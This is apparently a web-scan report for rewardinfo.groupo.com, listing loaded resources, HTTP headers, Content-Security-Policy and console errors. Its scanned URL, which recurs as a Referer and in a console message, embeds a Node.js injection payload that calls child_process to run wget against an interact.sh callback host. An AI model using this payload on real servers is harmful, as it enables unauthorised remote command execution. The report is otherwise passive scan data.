default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
bootstrap.min.js
rewardinfo.groupo.com/scripts/
62 KB
21 KB
Script
General
Full URL
http://rewardinfo.groupo.com/scripts/bootstrap.min.js
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
a4555d8dee9f8adc976e84a97dfe87e6bf5794b579f49bb56f133fed85f7d709
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Connection
keep-alive
Content-Length
21390
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
application/javascript
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
ai.0.js
az416426.vo.msecnd.net/scripts/a/
0
0

attglobe.png
rewardinfo.groupo.com/Content/images/
3 KB
3 KB
Image
General
Full URL
http://rewardinfo.groupo.com/Content/images/attglobe.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/Content/Site.css
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
d47cf9f8fb204daf2c0cf03038385cda1ce0d65f1e4d5f655ee28fafdb4587a0
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/Content/Site.css
Connection
keep-alive
Cache-Control
no-cache

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
2592
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
ATTAleckSans_W_Lt.woff
rewardinfo.groupo.com/Content/fonts/
22 KB
23 KB
Font
General
Full URL
http://rewardinfo.groupo.com/Content/fonts/ATTAleckSans_W_Lt.woff
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/Content/Site.css
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
e8d5fae41878b2727ab8fb243bc4bf071238077f621e2bc110bff7ca4ffb962e
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Origin
http://rewardinfo.groupo.com
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Cache-Control
no-cache
Referer
http://rewardinfo.groupo.com/Content/Site.css
Connection
keep-alive

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
font/x-woff
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
22564
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
ATTAleckSans_W_Bd.woff
rewardinfo.groupo.com/Content/fonts/
23 KB
23 KB
Font
General
Full URL
http://rewardinfo.groupo.com/Content/fonts/ATTAleckSans_W_Bd.woff
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/Content/Site.css
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
f13ffc0adc7e47990e67bcfb8f355a65c29361b12f0f20d5067ac880393685bc
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Origin
http://rewardinfo.groupo.com
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Cache-Control
no-cache
Referer
http://rewardinfo.groupo.com/Content/Site.css
Connection
keep-alive

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
font/x-woff
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
23052
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain
az416426.vo.msecnd.net
URL
https://az416426.vo.msecnd.net/scripts/a/ai.0.js

7 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| onbeforexrselect
boolean| originAgentCluster
object| appInsights
function| $
function| jQuery
object| bootstrap
function| checkWidth

0 Cookies

1 Console Messages

Source: security
Level: error
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);// (Line 22)
Message: Refused to load the script 'https://az416426.vo.msecnd.net/scripts/a/ai.0.js' because it violates the following Content Security Policy directive: "script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com". Note that 'script-src-elem' was not explicitly set, so 'script-src' is used as a fallback.

Security Headers

This page lists any security headers set by the main page.

Header Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block